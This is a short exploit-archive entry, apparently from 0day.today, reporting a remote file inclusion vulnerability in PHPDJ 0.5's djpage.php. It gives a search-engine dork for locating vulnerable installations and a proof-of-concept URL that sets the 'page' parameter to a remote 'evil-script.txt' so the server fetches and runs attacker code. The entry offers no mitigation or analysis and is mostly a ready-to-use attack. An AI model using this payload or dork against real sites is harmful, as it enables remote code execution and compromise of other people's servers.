id: 2230
date: 10/16/2007
title: PHPDJ 0.5 (djpage.php page) Remote File Inclusion Vulnerability
author: GoLd_M
cves: 

===============================================================
PHPDJ 0.5 (djpage.php page) Remote File Inclusion Vulnerability
===============================================================



################################################################
PHPDJ v05 (page) Remote File Inclusion Vulnerability
D.S: http://sourceforge.net/projects/phpdj/
D0RK : allintext:"PHPDJ was created by www.php-mania.co.uk"
POC :
       /PHPDJ_v05/dj/djpage.php?page=evil-script.txt?
################################################################



#  0day.today [2023-03-21]  #